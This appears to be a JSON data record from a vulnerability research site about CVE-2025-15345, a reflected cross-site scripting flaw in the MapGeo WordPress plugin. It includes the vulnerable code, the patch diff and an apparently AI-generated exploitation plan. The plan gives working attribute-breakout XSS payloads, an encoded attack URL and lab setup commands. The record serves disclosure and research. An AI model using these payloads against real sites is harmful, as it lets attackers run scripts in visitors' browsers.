[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEailBt5VN9GnR6W8VBvRpsSonR0xISe2SdLKLVvSaJw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2025-15345","mapgeo-interactive-geo-maps-reflected-cross-site-scripting-via-map-parameter","MapGeo - Interactive Geo Maps \u003C= 1.6.27 - Reflected Cross-Site Scripting via 'map' Parameter","The MapGeo – Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","interactive-geo-maps",null,"\u003C=1.6.27","1.6.28","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","2026-05-13 17:15:30","2026-05-14 05:30:31",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbfccbf41-c861-4bf1-b400-7858cb255b9a?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fpublic\u002Fmap-actions\u002Factions.min.js","assets\u002Fpublic\u002Fmap-service\u002Fapp.min.js","interactive-geo-maps.php","readme.txt","src\u002FPlugin\u002FMap.php","vendor\u002Fcomposer\u002Fautoload_static.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"This exploitation research plan targets **CVE-2025-15345**, a reflected Cross-Site Scripting (XSS) vulnerability in the **MapGeo - Interactive Geo Maps** plugin for WordPress.\n\n### 1. Vulnerability Summary\n* **Vulnerability:** Reflected Cross-Site Scripting (XSS)\n* **Location:** `src\u002FPlugin\u002FMap.php`, within the `setup()` method.\n* **Cause:** The plugin allows the `map` parameter from the URL (`$_GET['map']`) to override the map configuration if the `display-map` shortcode includes a `demo` attribute. While the input is passed through `sanitize_text_field()`, this function only removes HTML tags and does not escape quotes. If the resulting value is reflected into an HTML attribute or a JavaScript context without proper output escaping (e.g., `esc_attr()` or `wp_json_encode()`), an attacker can break out and execute arbitrary scripts.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** Any public post or page containing the `[display-map]` shortcode with the `demo` attribute enabled.\n* **Vulnerable Parameter:** `map` (GET parameter).\n* **Authentication:** Unauthenticated.\n* **Precondition:** A page must exist with a shortcode like `[display-map id=\"123\" demo=\"true\"]`. The `id` must refer to a valid Map (`igmap` post type).\n\n### 3. Code Flow\n1. A user visits a page where the `[display-map]` shortcode is rendered.\n2. The shortcode callback instantiates the `Saltus\\WP\\Plugin\\Saltus\\InteractiveMaps\\Plugin\\Map` class and calls `setup( $atts )`.\n3. In `src\u002FPlugin\u002FMap.php`:\n * Line 48: The `$id` is extracted from `$atts['id']`.\n * Line 75: The code checks `if ( isset( $atts['demo'] ) && isset( $_GET['map'] ) )`.\n * Line 76: If true, `$main_meta['map']` is set to `sanitize_text_field( $_GET['map'] )`.\n4. `sanitize_text_field()` removes `\u003Cscript>` tags but leaves double quotes (`\"`) and event handlers (like `onmouseover`) intact.\n5. The `$main_meta` (containing the malicious `map` value) is passed to `prepare_meta()`.\n6. The value is eventually rendered into the page's HTML (likely as a `data-map` attribute or within a `\u003Cscript>` block containing map configuration), where the lack of output escaping leads to XSS.\n\n### 4. Nonce Acquisition Strategy\nThis is a **Reflected XSS** vulnerability. Since the payload is delivered via a GET parameter to a standard WordPress page rendering a shortcode, **no nonce is required** for exploitation.\n\n### 5. Exploitation Strategy\nThe goal is to provide a payload that breaks out of an HTML attribute and executes JavaScript.\n\n1. **Payload Selection:** Since `sanitize_text_field` is used, we avoid tags. We use an attribute breakout.\n * **Payload:** `worldLow\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" x=\"`\n * **Mechanism:** This closes the intended attribute, adds an `onmouseover` handler, and stretches the element to cover the entire viewport to ensure the script triggers immediately on any mouse movement.\n\n2. **HTTP Request:**\n * **Method:** `GET`\n * **URL:** `http:\u002F\u002Flocalhost:8080\u002F{PAGE_PATH}\u002F?map=worldLow%22+onmouseover%3D%22alert(document.domain)%22+style%3D%22position%3Afixed%3Btop%3A0%3Bleft%3A0%3Bwidth%3A100%25%3Bheight%3A100%25%3B%22+x%3D%22`\n * **Headers:** Standard browser headers.\n\n### 6. Test Data Setup\nThe automated agent must perform these steps via `wp-cli`:\n\n1. **Create a Map:**\n ```bash\n wp post create --post_type=igmap --post_title=\"Exploit Map\" --post_status=publish\n ```\n *Extract the resulting post ID (e.g., `123`).*\n\n2. **Create a Page with the Shortcode:**\n ```bash\n wp post create --post_type=page --post_title=\"Vulnerable Page\" --post_status=publish --post_content='[display-map id=\"123\" demo=\"true\"]'\n ```\n *Extract the resulting page URL\u002Fpath (e.g., `\u002Fvulnerable-page\u002F`).*\n\n### 7. Expected Results\n* The HTTP response will contain the injected string: `worldLow\" onmouseover=\"alert(document.domain)\"`.\n* The payload will appear inside an HTML tag (likely a `\u003Cdiv>` or `\u003Cscript>` tag depending on the specific rendering path) without the quotes being escaped to `"`.\n* When viewed in a browser, moving the mouse will trigger the alert.\n\n### 8. Verification Steps\n1. **Check Reflection:** Use the `http_request` tool to fetch the page with the payload and grep for the unescaped breakout:\n ```javascript\n const response = await http_request.get(\"http:\u002F\u002Flocalhost:8080\u002Fvulnerable-page\u002F?map=worldLow%22+onmouseover%3D%22alert(1)%22\");\n if (response.body.includes('map=\"worldLow\" onmouseover=\"alert(1)\"')) {\n console.log(\"Vulnerability Confirmed: Payload reflected unescaped.\");\n }\n ```\n2. **Confirm Lack of Escaping:** Verify that the double quote before `onmouseover` is not converted to `"`.\n\n### 9. Alternative Approaches\nIf the `map` parameter is reflected inside a JavaScript block (e.g., in a JSON object) rather than an HTML attribute:\n* **Payload:** `worldLow\"-alert(document.domain)-\"`\n* **Expected Reflection:** `... \"map\":\"worldLow\"-alert(document.domain)-\"\" ...`\n* This would execute the alert if the surrounding JavaScript is parsed by the browser.","The MapGeo plugin for WordPress is vulnerable to reflected Cross-Site Scripting (XSS) via the 'map' GET parameter. When a shortcode is configured with the 'demo' attribute, the plugin accepts an unvalidated map name from the URL, which is reflected into the page without proper attribute escaping, allowing attackers to execute arbitrary JavaScript.","\u002F\u002F src\u002FPlugin\u002FMap.php line 75\n\u002F\u002F in case we use this shortcode for demo purposes, the map that will render might ne in the URL\nif ( isset( $atts['demo'] ) && isset( $_GET['map'] ) ) {\n $main_meta['map'] = sanitize_text_field( $_GET['map'] );\n}","--- a\u002Fsrc\u002FPlugin\u002FMap.php\n+++ b\u002Fsrc\u002FPlugin\u002FMap.php\n@@ -73,7 +73,7 @@\n }\n \u002F\u002F in case we use this shortcode for demo purposes, the map that will render might ne in the URL\n if ( isset( $atts['demo'] ) && isset( $_GET['map'] ) ) {\n- $main_meta['map'] = sanitize_text_field( $_GET['map'] );\n+ $main_meta['map'] = preg_replace( '\u002F[^a-zA-Z0-9_\\\u002F]\u002F', '', $_GET['map'] );\n }\n $meta = $this->prepare_meta( $main_meta, $id );","To exploit this vulnerability, an attacker identifies a page using the [display-map] shortcode with the 'demo' attribute set to true. The attacker then crafts a malicious URL targeting that page, appending a 'map' GET parameter containing a payload designed to break out of an HTML attribute (e.g., worldLow\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" x=\"). Because the plugin uses sanitize_text_field() which preserves double quotes and does not perform sufficient output escaping, the payload is rendered into the HTML source as an active event handler. When a victim visits the link and moves their mouse over the map area, the injected script executes in their browser context. No authentication is required for this attack.","gemini-3-flash-preview","2026-05-14 17:16:24","2026-05-14 17:17:56",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","1.6.27","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags\u002F1.6.27","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finteractive-geo-maps.1.6.27.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags\u002F1.6.28","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finteractive-geo-maps.1.6.28.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Finteractive-geo-maps\u002Ftags"]